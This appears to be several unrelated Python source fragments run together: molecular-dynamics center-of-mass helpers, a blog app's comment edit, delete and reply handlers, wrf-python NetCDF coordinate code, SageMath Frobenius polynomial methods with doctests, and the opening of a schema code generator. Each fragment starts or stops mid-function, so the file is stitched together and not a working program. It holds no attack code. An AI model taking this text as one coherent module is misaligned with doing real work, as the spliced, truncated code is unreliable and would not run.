shift[i, :] = put_in_box(shift[i, :], box[t, 0, 0], box[t, 1, 1], m[t], angle[t]) # if its not in the unitcell, shift it so it is
c = [np.mean(shift, axis=0)]
centers[t, p, l - 1, :] = transform.translate(c, center[t, :], before) # move everything back to where it was
while not bounds[t].contains_point(centers[t, p, l - 1, :]): # make sure everything is in the box again
centers[t, p, l - 1, :] = put_in_box(centers[t, p, l - 1, :], box[t, 0, 0], box[t, 1, 1], m[t], angle[t])
if single_frame:
return centers[0, ...] # doesn't return bin center yet
else:
if save:
file_rw.save_object((centers, bin_centers), savename)
return centers, bin_centers
def center_of_mass(pos, mass_atoms):
""" Calculate center of mass of residues over a trajectory
:param pos: xyz coordinates of atoms
:param mass_atoms : mass of atoms in order they appear in pos
:type pos: np.array (nframes, natoms, 3)
:type mass_atoms: list
:return: center of mass of each residue at each frame
"""
nframes = pos.shape[0]
natoms = len(mass_atoms)
com = np.zeros([nframes, pos.shape[1] // natoms, 3]) # track the center of mass of each residue
for f in range(nframes):
for i in range(com.shape[1]):
w = (pos[f, i * natoms:(i + 1) * natoms, :].T * mass_atoms).T # weight each atom in the residue by its mass
com[f, i, :] = np.sum(w, axis=0) / sum(mass_atoms) # sum the coordinates and divide by the mass of the residue
return com
def residue_center_of_mass(t, res):
""" Calculate the center of mass versus time of a residue in an MD trajectory
:param t: mdtraj trajectory object
:param res: name of residue to track
:type t: object
:type res: str
:return: center of mass of residue versus time
"""
residue = topology.Residue(res) # get resiude attributes
ndx = [a.index for a in t.topology.atoms if a.residue.name == res] # index of all residue atoms
names = [a.name for a in t.topology.atoms if a.residue.name == res][:residue.natoms] # names of atoms in one residue
mass = [residue.mass[x] for x in names] # mass of atoms in order that they appear in file
print('Calculating center of mass trajectories of residue %s' % residue.name)
return center_of_mass(t.xyz[:, ndx, :], mass) # determine center of mass trajectories
def compdensity(coord, pore_centers, box, cut=1.5, nbins=50, spline=False):
""" Measure the density of a component as a function of the distance from | |
child
del_comment_session_val(c_child)
c_child.delete()
# Delete the master parent, 'curr_comment'
del_comment_session_val(c)
c.delete()
# Call recursive delete on current comment entity
del_curr_comment(curr_comment)
except LookupError:
print (""""Error deleting comments and
associated replies....""")
finally:
print ("""Done handling comment delete...
submitting output of result.""")
# Check to make sure comment is delete
comment_check = Comment.get_by_id(long(self.comment_id))
print "Comment Check returned: %s" % comment_check
# Redirect if Comment instance deleted successfully
if comment_check is None:
# Clear any messages
self.web_obj.clear_main_msg()
self.web_obj.clear_msg_type()
# Set success msg
self.web_obj.set_main_msg(('''Success in deleting
COMMENT for Post: "%s"''')
% post_subject)
self.web_obj.set_msg_type("notice")
# Update session variable
self.web_obj.session["messages_viewed"] = 0
self.web_obj._set_jinja_variable_session()
self.web_obj.redirect("/blog/welcome")
else:
print "DELETE of COMMENT instance failed!"
# Case 3: USER is NOT Owner of COMMENT here. So Can't DELETE
else:
print ("""ERROR in DELETING comment instance with
logged in and valid user...""")
# Display error message indicating they need to
# be comment owner to delete
self.web_obj.clear_main_msg()
self.web_obj.clear_msg_type()
self.web_obj.set_main_msg("""You can ONLY delete your
own comments...""")
self.web_obj.set_msg_type("error")
# Update session variables
self.web_obj.session["messages_viewed"] = 0
self.web_obj._set_jinja_variable_session()
self.web_obj.redirect("/blog/welcome")
class EditCommentHandler:
def __init__(self, web_obj, comment_id, comment_body,
post_id, initial_render=None):
self.web_obj = web_obj
self.comment_id = comment_id
self.comment_body = comment_body
self.post_id = post_id
self.initial_render = initial_render
def finalize_edit(self, post_subject, curr_comment, comment_body, user):
"""
No need check for user login check/validation here
as this function is only called through class functions.
i.e. it isn't accessible through its own endpoint
Existing endpoints already check authencation before this point.
In any event, if user=None, it would mean we couldn't
add a reply.
"""
# User at this point would be VALID and IS LOGGED IN
# We can proceed to add our NEW reply
if user:
# Use the values from the passed request
print ("""Post comment body received...
Performing Update...""")
curr_comment.comment = comment_body
curr_comment.put()
# Check to make sure comment still exists
comment_check = (
Comment.get_by_id(long(self.comment_id)))
print "Comment Check returned: %s" % comment_check
# Notify if we can't find Comment
# instance for some reason
if comment_check is None:
print "CANNOT find Comment instance!"
else:
print "SUCCESS Editing Comment instance!"
# display notices indicating success
self.web_obj.clear_main_msg()
self.web_obj.clear_msg_type()
self.web_obj.set_main_msg('''Success in
editing COMMENT
for Post: "%s"''' %
post_subject)
self.web_obj.set_msg_type("notice")
# Update session variables
self.web_obj.session["messages_viewed"] = 0
self.web_obj._set_jinja_variable_session()
self.web_obj.redirect("/blog/welcome")
def edit_comment(self):
print "IN: EditCommentHandler.edit_comment()"
self.web_obj.session["curr_handler"] = "EditCommentHandler"
curr_comment = Comment.get_by_id(long(self.comment_id))
parent_post = Post.get_by_id(long(self.post_id))
# Used for user output later
post_subject = parent_post.subject[:20]
comment_form_error = ""
try:
post_comm_tag = ("post_%s_comment_%s_form_error" %
(self.post_id, self.comment_id))
if self.web_obj.session.get(post_comm_tag) is not None:
# Clear our Comment Form Errors
self.web_obj.clear_commentform_errors(self.comment_id,
self.post_id)
# Clear our Main MSG area
self.web_obj.clear_main_msg()
except LookupError:
print "Nothing exists in COMMENT_FORM_ERROR value in session."
print ("EDIT Comment received...")
# Check for logged in/valid user
auth = Authenticator(self.web_obj)
auth_check = auth.authenticate()
# Set our base variables based on Auth result
user = auth_check.get("user")
user_logged_in = auth_check.get("user_logged_in")
user_valid = auth_check.get("user_valid")
# Case 1: User is NOT logged in, or NOT valid
if user_logged_in is False and user_valid is False:
print "Either NOT Logged In, or NOT Valid..."
# set error message for user
try:
self.web_obj.session["post_%s_comment_%s_form_error" %
(self.post_id, self.comment_id)] = (
"""MUST Login to EDIT a COMMENT!""")
self.web_obj.set_main_msg("""Please <a href='/blog/login'>
Login</a> to EDIT COMMENT for post:
'%s...'""" % post_subject)
self.web_obj.set_msg_type("error")
self.web_obj.session["messages_viewed"] = 0
self.web_obj._set_jinja_variable_session()
self.web_obj.redirect("/blog/login")
except LookupError:
print "Cannot add session variables for EDIT comment action"
print "USER Not Logged In....for EDIT comment"
# Case 2: User IS LOGGED IN and VALID
if user_logged_in is True and user_valid is True:
# Comment Edit, ensure comment is not NONE
if curr_comment is not None:
# Then we can edit this comment, if they are comment owner
# OWNER CHECK
if curr_comment.created_by == user.username:
print "User is OWNER of Comment. *CAN* Edit"
# EDIT COMMENT HERE
if self.comment_body is None or self.comment_body == "":
# Render our EditComment Page for comment editing
if (self.initial_render == "true"):
# Set our default form values to
# what is in datastore
self.comment_body = curr_comment.comment
comment_validation = ""
validation_error = False
if self.comment_body == "":
comment_validation = ("""Comment must
contain TEXT body
before submit...""")
validation_error = True
main_user_msgs = ""
msg_type = None
if validation_error is True:
print ("""We have a validation error....
So setting main message...""")
self.web_obj.clear_main_msg()
self.web_obj.clear_msg_type()
self.web_obj.set_main_msg("""Edit COMMENT
values missing...""")
self.web_obj.set_msg_type("error")
main_user_msgs = self.web_obj.get_main_msg()
msg_type = self.web_obj.get_msg_type()
# Update session variable
self.web_obj.session["messages_viewed"] = 1
self.web_obj._set_jinja_variable_session()
# Render our EDIT comment form
self.web_obj.render("editcomment.html",
post=parent_post,
comment=curr_comment,
comment_body=self.comment_body,
comment_validation=(
comment_validation),
main_user_msgs=main_user_msgs,
msg_type=msg_type)
else:
# Finalize our EDIT and submit to DataStore
self.finalize_edit(post_subject, curr_comment,
self.comment_body, user)
# USER is NOT OWNER of COMMENT. So can't EDIT
else:
print ("""ERROR in EDITING comment instance with
logged in and valid user...""")
# Display error message indicating they need
# to be comment owner to delete
self.web_obj.clear_main_msg()
self.web_obj.clear_msg_type()
self.web_obj.set_main_msg("""You can ONLY edit your
own comments...""")
self.web_obj.set_msg_type("error")
# Update session variables
self.web_obj.session["messages_viewed"] = 0
self.web_obj._set_jinja_variable_session()
self.web_obj.redirect("/blog/welcome")
class CommentReplyHandler:
def __init__(self, web_obj, comment_id, post_id, reply_body,
initial_render=None):
self.web_obj = web_obj
self.comment_id = comment_id
self.post_id = post_id
self.reply_body = reply_body
self.initial_render = initial_render
def __add_reply(self, parent_post, user, parent_comment, reply_body,
created_by):
"""
No need check for user login check/validation here
as this function is only called through class functions.
i.e. it isn't accessible through its own endpoint
Existing endpoints already check authencation before this point.
In any event, if user=None, it would mean we couldn't
add a reply.
"""
# User at this point would be VALID and IS LOGGED IN
# We can proceed to add our NEW reply
if user:
c = Comment(post=parent_post, user=user,
comment_parent=parent_comment,
comment=reply_body,
created_by=created_by)
key = c.put()
# Do a quick verify of add
new_reply = Comment.get(key)
print "New Reply is: %s" % new_reply
# Update session to reflect user as reply
# (i.e. a comment object) OWNER
self.web_obj.session["post_%s_comment_%s_owner" %
(parent_post.key().id(),
c.key().id())] = "true"
self.web_obj._set_jinja_variable_session()
# Redirect to blog post permalink page which displays
# all comments and replies
self.web_obj.redirect("/blog/%s" % parent_post.key().id())
def get_reply_frm(self):
print "IN: CommentReplyHandler.get_reply_frm()"
# OUR PARENT objects
parent_comment = Comment.get_by_id(long(self.comment_id))
parent_post = Post.get_by_id(long(self.post_id))
last_handler = None
messages_viewed = 0
try:
last_handler = self.web_obj.session.get("curr_handler")
messages_viewed = self.web_obj.session.get("messages_viewed")
except LookupError:
print "No Last Handler or Errors Viewed values exist..."
finally:
self.web_obj.session["curr_handler"] = "CommentReplyHandler"
# Refresh our stored jinja inkpenbam session variable
stored_jinja_session = self.web_obj._get_jinja_variable_session()
if stored_jinja_session is None:
self.web_obj._set_jinja_variable_session()
# Get referrer source
source = self.web_obj.get_ref_source()
if source is not None:
if messages_viewed == 1:
# Clear any previous session messages to display a clean page
print "Previously displayed errors. So clearing..."
self.web_obj.clear_main_msg()
# Get User MSGS to display
main_user_msgs = self.web_obj.get_main_msg()
msg_type = self.web_obj.get_msg_type()
# Used for user output later
post_subject = parent_post.subject[:20]
# Check for logged in/valid user
auth = Authenticator(self.web_obj)
auth_check = auth.authenticate()
# Set our base variables based on Auth result
user = auth_check.get("user")
user_logged_in = auth_check.get("user_logged_in")
user_valid = auth_check.get("user_valid")
# Case 1: User is NOT LOGGED In, or NOT Valid
if user_logged_in is False or user_valid is False:
self.web_obj.set_main_msg("""You need to <a href='/blog/login'>
Login</a> to REPLY to a
post comment.""")
self.web_obj.set_msg_type("error")
self.web_obj.session["messages_viewed"] = 0
self.web_obj._set_jinja_variable_session()
self.web_obj.redirect("/blog/login")
# Case 2: User IS LOGGED IN and VALID
if user_logged_in is True and user_valid is True:
# Set some default values
reply_validation = ""
validation_error = False
main_user_msgs = ""
msg_type = None
created_by = user.username
if self.reply_body is None and self.initial_render == "true":
# We can just skip out initial form validation
print "Initial REPLY-FORM-REQUEST received..."
self.reply_body = ""
else:
# Then our user is submitting an actual reply,
# from the form
# PEFORM some validation
if self.reply_body == "":
reply_validation = ("""Reply must contain REPLY
text before submit...""")
validation_error = True
if validation_error is True:
print ("""We have a validation error....
Setting msg for our user...""")
self.web_obj.clear_main_msg()
self.web_obj.clear_msg_type()
self.web_obj.set_main_msg("Reply values are missing...")
self.web_obj.set_msg_type("error")
main_user_msgs = self.web_obj.get_main_msg()
msg_type = self.web_obj.get_msg_type()
# Update session variables
self.web_obj.session["messages_viewed"] = 1
self.web_obj._set_jinja_variable_session()
if self.reply_body == "" or validation_error is True:
# Render our Reply Form in either case
self.web_obj.render("newcomment-reply.html",
reply_validation=reply_validation,
main_user_msgs=main_user_msgs,
msg_type=msg_type, post=parent_post,
comment=parent_comment,
post_subject=post_subject,
reply=self.reply_body)
elif self.reply_body != | |
in _TIME_COORD_VARS if name in coords][0]
except IndexError:
xtime_coord = None
return lat_coord, lon_coord, xtime_coord
def _find_max_time_size(wrfseq):
"""Return the maximum number of times found in a sequence of
WRF files.
Args:
wrfseq (sequence): A sequence of WRF NetCDF file objects.
Returns:
:obj:`int`: The maximum number of times found in a file.
"""
wrf_iter = iter(wrfseq)
max_times = 0
while True:
try:
wrfnc = next(wrf_iter)
except StopIteration:
break
else:
t = extract_dim(wrfnc, "Time")
max_times = t if t >= max_times else max_times
return max_times
def _get_coord_names(wrfin, varname):
# Need only the first real file
if is_multi_file(wrfin):
if not is_mapping(wrfin):
wrfnc = next(iter(wrfin))
else:
entry = wrfin[next(iter(viewkeys(wrfin)))]
return _get_coord_names(entry, varname)
else:
wrfnc = wrfin
lat_coord = None
lon_coord = None
time_coord = None
var = wrfnc.variables[varname]
# WRF variables will have a coordinates attribute. MET_EM files have
# a stagger attribute which indicates the coordinate variable.
try:
# WRF files
coord_attr = getattr(var, "coordinates")
except AttributeError:
if is_coordvar(varname):
# Coordinate variable (most likely XLAT or XLONG)
lat_coord, lon_coord = get_coord_pairs(varname)
time_coord = None
if has_time_coord(wrfnc):
time_coord = "XTIME"
elif is_time_coord_var(varname):
lon_coord = None
lat_coord = None
time_coord = None
else:
try:
# met_em files or old WRF files
stag_attr = getattr(var, "stagger")
except AttributeError:
lon_coord = None
lat_coord = None
# Let's just check for xlat and xlong in this case
if "XLAT" in wrfnc.variables:
lat_coord = "XLAT"
lon_coord = "XLONG"
else:
# For met_em files, use the stagger name to get the lat/lon var
lat_coord = "XLAT_{}".format(stag_attr)
lon_coord = "XLONG_{}".format(stag_attr)
# If this coord name is missing, it might be an old WRF file
if lat_coord not in wrfnc.variables:
lat_coord = None
lon_coord = None
if "XLAT" in wrfnc.variables:
lat_coord = "XLAT"
lon_coord = "XLONG"
else:
if isinstance(coord_attr, str):
coord_names = coord_attr.split()
else:
coord_names = coord_attr.decode().split()
lon_coord = coord_names[0]
lat_coord = coord_names[1]
try:
time_coord = coord_names[2]
except IndexError:
time_coord = None
else:
# Make sure they time variable wasn't removed
try:
_ = wrfnc.variables[time_coord]
except KeyError:
time_coord = None
return lat_coord, lon_coord, time_coord
def _build_data_array(wrfnc, varname, timeidx, is_moving_domain, is_multifile,
_key):
"""Return a :class:`xarray.DataArray` object for the desired variable in
a single NetCDF file object.
Args:
wrfnc (:class:`netCDF4.Dataset`, :class:`Nio.NioFile`): A single
WRF NetCDF file object.
varname (:obj:`str`) : The variable name.
timeidx (:obj:`int` or :data:`wrf.ALL_TIMES`, optional): The
desired time index. This value can be a positive integer,
negative integer, or
:data:`wrf.ALL_TIMES` (an alias for None) to return
all times in the file or sequence. The default is 0.
is_moving_domain (:obj:`bool`): A boolean type that indicates if the
NetCDF file object came from a moving nest.
is_multifile (:obj:`bool`): A boolean type that indicates if the NetCDF
file object came from a sequence.
_key (:obj:`int`, optional): Cache key for the coordinate variables.
This is used for internal purposes only. Default is None.
Returns:
:class:`xarray.DataArray`: An array object that contains metadata.
"""
# Note: wrfnc is always a single netcdf file object
# is_moving_domain and is_multifile are arguments indicating if the
# single file came from a sequence, and if that sequence is has a moving
# domain. Both arguments are used mainly for coordinate extraction and
# caching.
multitime = is_multi_time_req(timeidx)
time_idx_or_slice = timeidx if not multitime else slice(None)
var = wrfnc.variables[varname]
if len(var.shape) > 1:
data = var[time_idx_or_slice, :]
else:
data = var[time_idx_or_slice]
# Want to preserve the time dimension
if not multitime:
if len(var.shape) > 1:
data = data[np.newaxis, :]
else:
data = data[np.newaxis]
attrs = OrderedDict()
for dkey, val in viewitems(var.__dict__):
# scipy.io adds these but don't want them
if dkey in ("data", "_shape", "_size", "_typecode", "_attributes",
"maskandscale", "dimensions"):
continue
_dkey = dkey if isinstance(dkey, str) else dkey.decode()
if isstr(val):
_val = val
else:
if isinstance(val, bytes):
_val = val.decode() # scipy.io.netcdf
else:
_val = val
attrs[_dkey] = _val
dimnames = var.dimensions[-data.ndim:]
lat_coord = lon_coord = time_coord = None
try:
if dimnames[-2] == "south_north" and dimnames[-1] == "west_east":
lat_coord, lon_coord, time_coord = _get_coord_names(wrfnc, varname)
except IndexError:
pass
coords = OrderedDict()
# Handle lat/lon coordinates and projection information if available
if lon_coord is not None and lat_coord is not None:
# Using a cache for coordinate variables so the extraction only happens
# once.
lon_coord_dimkey = lon_coord + "_dim"
lon_coord_valkey = lon_coord + "_val"
lat_coord_dimkey = lat_coord + "_dim"
lat_coord_valkey = lat_coord + "_val"
lon_coord_dims = get_cached_item(_key, lon_coord_dimkey)
lon_coord_vals = get_cached_item(_key, lon_coord_valkey)
if lon_coord_dims is None or lon_coord_vals is None:
lon_var = wrfnc.variables[lon_coord]
lon_coord_dims = lon_var.dimensions
lon_coord_vals = lon_var[:]
# Only cache here if the domain is not moving, otherwise
# caching is handled by cat/join
if not is_moving_domain:
cache_item(_key, lon_coord_dimkey, lon_coord_dims)
cache_item(_key, lon_coord_valkey, lon_coord_vals)
lat_coord_dims = get_cached_item(_key, lat_coord_dimkey)
lat_coord_vals = get_cached_item(_key, lat_coord_valkey)
if lat_coord_dims is None or lat_coord_vals is None:
lat_var = wrfnc.variables[lat_coord]
lat_coord_dims = lat_var.dimensions
lat_coord_vals = lat_var[:]
# Only cache here if the domain is not moving, otherwise
# caching is done in cat/join
if not is_moving_domain:
cache_item(_key, lat_coord_dimkey, lat_coord_dims)
cache_item(_key, lat_coord_valkey, lat_coord_vals)
time_coord_vals = None
if time_coord is not None:
# If not from a multifile sequence, then cache the time
# coordinate. Otherwise, handled in cat/join/
if not is_multifile:
time_coord_vals = get_cached_item(_key, time_coord)
if time_coord_vals is None:
time_coord_vals = wrfnc.variables[time_coord][:]
if not is_multifile:
cache_item(_key, time_coord, time_coord_vals)
else:
time_coord_vals = wrfnc.variables[time_coord][:]
if multitime:
if is_moving_domain:
# Special case with a moving domain in a multi-time file,
# otherwise the projection parameters don't change
coords[lon_coord] = lon_coord_dims, lon_coord_vals
coords[lat_coord] = lat_coord_dims, lat_coord_vals
else:
coords[lon_coord] = (lon_coord_dims[1:],
lon_coord_vals[0,:])
coords[lat_coord] = (lat_coord_dims[1:],
lat_coord_vals[0,:])
if time_coord is not None:
coords[time_coord] = (lon_coord_dims[0], time_coord_vals)
else:
coords[lon_coord] = (lon_coord_dims[1:],
lon_coord_vals[timeidx,:])
coords[lat_coord] = (lat_coord_dims[1:],
lat_coord_vals[timeidx,:])
if time_coord is not None:
coords[time_coord] = (lon_coord_dims[0],
[time_coord_vals[timeidx]])
proj_params = get_proj_params(wrfnc)
proj = getproj(**proj_params)
attrs["projection"] = proj
if dimnames[0] == "Time":
t = extract_times(wrfnc, timeidx, meta=False, do_xtime=False)
if not multitime:
t = [t]
coords[dimnames[0]] = t
data_array = DataArray(data, name=varname, dims=dimnames, coords=coords,
attrs=attrs)
return data_array
def _find_forward(wrfseq, varname, timeidx, is_moving, meta, _key):
"""Find and return the array object within a sequence for a specific time
index.
Args:
wrfseq (iterable): An iterable type, which includes lists, tuples,
dictionaries, generators, and user-defined classes.
varname (:obj:`str`) : The variable name.
timeidx (:obj:`int`): The desired time index. Must be positive.
is_moving (:obj:`bool`): A boolean type that indicates if the
sequence is a moving nest.
meta (:obj:`bool`, optional): Set to False to disable metadata and
return :class:`numpy.ndarray` instead of
:class:`xarray.DataArray`. Default is True.
_key (:obj:`int`, optional): Cache key for the coordinate variables.
This is used for internal purposes only. Default is None.
Returns:
:class:`xarray.DataArray` or :class:`numpy.ndarray`: If xarray is
enabled and the *meta* parameter is True, then the result will be a
:class:`xarray.DataArray` object. Otherwise, the result will be a
:class:`numpy.ndarray` object with no metadata.
"""
wrf_iter = iter(wrfseq)
comboidx = 0
while True:
try:
wrfnc = next(wrf_iter)
except StopIteration:
break
else:
numtimes = extract_dim(wrfnc, "Time")
if timeidx < comboidx + numtimes:
filetimeidx = timeidx - comboidx
if meta:
return _build_data_array(wrfnc, varname, filetimeidx,
is_moving, True, _key)
else:
var = wrfnc.variables[varname]
if len(var.shape) > 1:
result = var[filetimeidx, :]
return result[np.newaxis, :] # So that nosqueeze works
else:
result = var[filetimeidx]
return result[np.newaxis] # So that nosqueeze works
else:
comboidx += numtimes
raise IndexError("timeidx {} is out of bounds".format(timeidx))
def _find_reverse(wrfseq, varname, timeidx, is_moving, meta, _key):
"""Find and | |
H = HyperellipticCurve(2*t^5 + 2*t + 4)
sage: H.frobenius_polynomial_cardinalities()
x^4 - x^3 - 52*x^2 - 37*x + 1369
Curve over a non-prime field::
sage: K.<z> = GF(7**2)
sage: R.<t> = PolynomialRing(K)
sage: H = HyperellipticCurve(t^5 + z*t + z^2)
sage: H.frobenius_polynomial_cardinalities()
x^4 + 8*x^3 + 70*x^2 + 392*x + 2401
This method may actually be useful when `hypellfrob` does not work::
sage: K = GF(7)
sage: R.<t> = PolynomialRing(K)
sage: H = HyperellipticCurve(t^9 + t^3 + 1)
sage: H.frobenius_polynomial_matrix(algorithm='hypellfrob')
Traceback (most recent call last):
...
ValueError: In the current implementation, p must be greater than (2g+1)(2N-1) = 81
sage: H.frobenius_polynomial_cardinalities()
x^8 - 5*x^7 + 7*x^6 + 36*x^5 - 180*x^4 + 252*x^3 + 343*x^2 - 1715*x + 2401
"""
g = self.genus()
q = self.base_ring().cardinality()
if a is None:
# this may actually call frobenius_polynomial()
a = self.count_points(g)
# maybe calling count_points_exhaustive() would make more sense
# but the method is currently only called with a precomputed list
# of number of points so it does not really matter
# computation of the reciprocal polynomial
s = [ai - q**(i+1) - 1 for i, ai in enumerate(a)]
coeffs = [1]
for i in range(1, g + 1):
c = 0
for j in range(i):
c += s[i-1-j]*coeffs[j]
coeffs.append(c/i)
coeffs = coeffs + [coeffs[g-i] * q**(i) for i in range(1, g + 1)]
return ZZ['x'](coeffs).reverse()
def frobenius_polynomial_matrix(self, M=None, algorithm='hypellfrob'):
r"""
Compute the charpoly of frobenius, as an element of `\ZZ[x]`,
by computing the charpoly of the frobenius matrix.
This is currently only supported when the base field is prime
and large enough using the ``hypellfrob`` library.
EXAMPLES::
sage: R.<t> = PolynomialRing(GF(37))
sage: H = HyperellipticCurve(t^5 + t + 2)
sage: H.frobenius_polynomial_matrix()
x^4 + x^3 - 52*x^2 + 37*x + 1369
A quadratic twist::
sage: H = HyperellipticCurve(2*t^5 + 2*t + 4)
sage: H.frobenius_polynomial_matrix()
x^4 - x^3 - 52*x^2 - 37*x + 1369
Curves defined over larger prime fields::
sage: K = GF(49999)
sage: R.<t> = PolynomialRing(K)
sage: H = HyperellipticCurve(t^9 + t^5 + 1)
sage: H.frobenius_polynomial_matrix()
x^8 + 281*x^7 + 55939*x^6 + 14144175*x^5 + 3156455369*x^4 + 707194605825*x^3 + 139841906155939*x^2 + 35122892542149719*x + 6249500014999800001
sage: H = HyperellipticCurve(t^15 + t^5 + 1)
sage: H.frobenius_polynomial_matrix() # long time, 8s on a Corei7
x^14 - 76*x^13 + 220846*x^12 - 12984372*x^11 + 24374326657*x^10 - 1203243210304*x^9 + 1770558798515792*x^8 - 74401511415210496*x^7 + 88526169366991084208*x^6 - 3007987702642212810304*x^5 + 3046608028331197124223343*x^4 - 81145833008762983138584372*x^3 + 69007473838551978905211279154*x^2 - 1187357507124810002849977200076*x + 781140631562281254374947500349999
This ``hypellfrob`` program doesn't support non-prime fields::
sage: K.<z> = GF(37**3)
sage: R.<t> = PolynomialRing(K)
sage: H = HyperellipticCurve(t^9 + z*t^3 + 1)
sage: H.frobenius_polynomial_matrix(algorithm='hypellfrob')
Traceback (most recent call last):
...
NotImplementedError: Computation of Frobenius matrix only implemented for hyperelliptic curves defined over prime fields.
"""
K = self.base_ring()
p = K.characteristic()
q = K.cardinality()
g = self.genus()
N = self._frobenius_coefficient_bound_charpoly()
# compute charpoly over ZZ and then reduce back
# (because charpoly of p-adic matrices sometimes loses precision)
M = self.frobenius_matrix(N=N, algorithm=algorithm).change_ring(ZZ)
# get a_g, ..., a_0 in ZZ (i.e. with correct signs)
f = M.charpoly().list()[g:2*g+1]
ppow = p**N
f = [x % ppow for x in f]
f = [x if 2*x < ppow else x - ppow for x in f]
# get a_{2g}, ..., a_{g+1}
f = [f[g-i] * q**(g-i) for i in range(g)] + f
return ZZ['x'](f)
def frobenius_polynomial_pari(self):
r"""
Compute the charpoly of frobenius, as an element of `\ZZ[x]`,
by calling the PARI function ``hyperellcharpoly``.
EXAMPLES::
sage: R.<t> = PolynomialRing(GF(37))
sage: H = HyperellipticCurve(t^5 + t + 2)
sage: H.frobenius_polynomial_pari()
x^4 + x^3 - 52*x^2 + 37*x + 1369
A quadratic twist::
sage: H = HyperellipticCurve(2*t^5 + 2*t + 4)
sage: H.frobenius_polynomial_pari()
x^4 - x^3 - 52*x^2 - 37*x + 1369
Slightly larger example::
sage: K = GF(2003)
sage: R.<t> = PolynomialRing(K)
sage: H = HyperellipticCurve(t^7 + 487*t^5 + 9*t + 1)
sage: H.frobenius_polynomial_pari()
x^6 - 14*x^5 + 1512*x^4 - 66290*x^3 + 3028536*x^2 - 56168126*x + 8036054027
Curves defined over a non-prime field are supported as well::
sage: K.<a> = GF(7^2)
sage: R.<t> = PolynomialRing(K)
sage: H = HyperellipticCurve(t^5 + a*t + 1)
sage: H.frobenius_polynomial_pari()
x^4 + 4*x^3 + 84*x^2 + 196*x + 2401
sage: K.<z> = GF(23**3)
sage: R.<t> = PolynomialRing(K)
sage: H = HyperellipticCurve(t^3 + z*t + 4)
sage: H.frobenius_polynomial_pari()
x^2 - 15*x + 12167
Over prime fields of odd characteristic, `h` may be non-zero::
sage: K = GF(101)
sage: R.<t> = PolynomialRing(K)
sage: H = HyperellipticCurve(t^5 + 27*t + 3, t)
sage: H.frobenius_polynomial_pari()
x^4 + 2*x^3 - 58*x^2 + 202*x + 10201
"""
f, h = self.hyperelliptic_polynomials()
return ZZ['x'](pari([f, h]).hyperellcharpoly())
@cached_method
def frobenius_polynomial(self):
r"""
Compute the charpoly of frobenius, as an element of `\ZZ[x]`.
EXAMPLES::
sage: R.<t> = PolynomialRing(GF(37))
sage: H = HyperellipticCurve(t^5 + t + 2)
sage: H.frobenius_polynomial()
x^4 + x^3 - 52*x^2 + 37*x + 1369
A quadratic twist::
sage: H = HyperellipticCurve(2*t^5 + 2*t + 4)
sage: H.frobenius_polynomial()
x^4 - x^3 - 52*x^2 - 37*x + 1369
Slightly larger example::
sage: K = GF(2003)
sage: R.<t> = PolynomialRing(K)
sage: H = HyperellipticCurve(t^7 + 487*t^5 + 9*t + 1)
sage: H.frobenius_polynomial()
x^6 - 14*x^5 + 1512*x^4 - 66290*x^3 + 3028536*x^2 - 56168126*x + 8036054027
Curves defined over a non-prime field of odd characteristic,
or an odd prime field which is too small compared to the genus,
are supported via PARI::
sage: K.<z> = GF(23**3)
sage: R.<t> = PolynomialRing(K)
sage: H = HyperellipticCurve(t^3 + z*t + 4)
sage: H.frobenius_polynomial()
x^2 - 15*x + 12167
sage: K.<z> = GF(3**3)
sage: R.<t> = PolynomialRing(K)
sage: H = HyperellipticCurve(t^5 + z*t + z**3)
sage: H.frobenius_polynomial()
x^4 - 3*x^3 + 10*x^2 - 81*x + 729
Over prime fields of odd characteristic, `h` may be non-zero::
sage: K = GF(101)
sage: R.<t> = PolynomialRing(K)
sage: H = HyperellipticCurve(t^5 + 27*t + 3, t)
sage: H.frobenius_polynomial()
x^4 + 2*x^3 - 58*x^2 + 202*x + 10201
Over prime fields of odd characteristic, `f` may have even degree::
sage: H = HyperellipticCurve(t^6 + 27*t + 3)
sage: H.frobenius_polynomial()
x^4 + 25*x^3 + 322*x^2 + 2525*x + 10201
In even characteristic, the naive algorithm could cover all cases
because we can easily check for squareness in quotient rings of
polynomial rings over finite fields but these rings unfortunately
do not support iteration::
sage: K.<z> = GF(2**5)
sage: R.<t> = PolynomialRing(K)
sage: H = HyperellipticCurve(t^5 + z*t + z**3, t)
sage: H.frobenius_polynomial()
x^4 - x^3 + 16*x^2 - 32*x + 1024
"""
K = self.base_ring()
e = K.degree()
q = K.cardinality()
g = self.genus()
f, h = self.hyperelliptic_polynomials()
if (e == 1 and
q >= (2*g+1)*(2*self._frobenius_coefficient_bound_charpoly()-1) and
h == 0 and f.degree() % 2):
return self.frobenius_polynomial_matrix()
elif q % 2 == 1:
return self.frobenius_polynomial_pari()
else:
return self.frobenius_polynomial_cardinalities()
def _points_fast_sqrt(self):
"""
List points by enumerating over x and solving the resulting
quadratic for y.
EXAMPLES::
sage: K.<a> = GF(9, 'a')
sage: x = polygen(K)
sage: C = HyperellipticCurve(x^7 - 1, x^2 + a)
sage: C._points_fast_sqrt()
[(0 : 1 : 0), (a : 2*a + 1 : 1), (2 : a + 1 : 1), (2*a + 2 : 2*a : 1), (2*a + 2 : 1 : 1), (1 : 2*a + 2 : 1), (1 : 0 : 1)]
sage: K.<a> = GF(49, 'a')
sage: x = polygen(K)
sage: C = HyperellipticCurve(x^5 - x^2 - 1, x^2 + a)
sage: len(C._points_fast_sqrt())
31
TESTS::
sage: x = polygen(GF(16, 'a'))
sage: C = HyperellipticCurve(x^5 - x + 1, x^2 + x + 1)
sage: set(C._points_fast_sqrt()) == set(C._points_cache_sqrt())
True
sage: x = polygen(GF(19))
sage: C = HyperellipticCurve(x^5 + 5*x^2 + 1, x + 1)
sage: set(C._points_fast_sqrt()) == set(C._points_cache_sqrt())
True
sage: x = polygen(GF(13))
sage: C = HyperellipticCurve(x^3 + x^2 - 1)
sage: C._points_fast_sqrt()
[(0 : 1 : 0), (0 : 5 : 1), (0 : 8 : 1), (1 : 1 : 1), (1 : 12 | |
from typing import Union, List
from . import cpp_templates, utils
from .utils import checked
from .version import __version__
from .third_party import triehash
from .schema import (
UxsdSchema,
UxsdComplex,
UxsdDfa,
UxsdAll,
UxsdLeaf,
UxsdElement,
UxsdEnum,
UxsdSimple,
UxsdString,
UxsdAtomic,
UxsdAttribute,
)
def pass_at_init(attr: UxsdAttribute):
if attr.optional:
return False
if attr.type.cpp == "const char *":
return False
return True
def _gen_attribute_arg(e: Union[UxsdElement, UxsdAttribute], out:bool=False) -> str:
if out:
return "%s * %s" % (e.type.cpp, checked(e.name))
else:
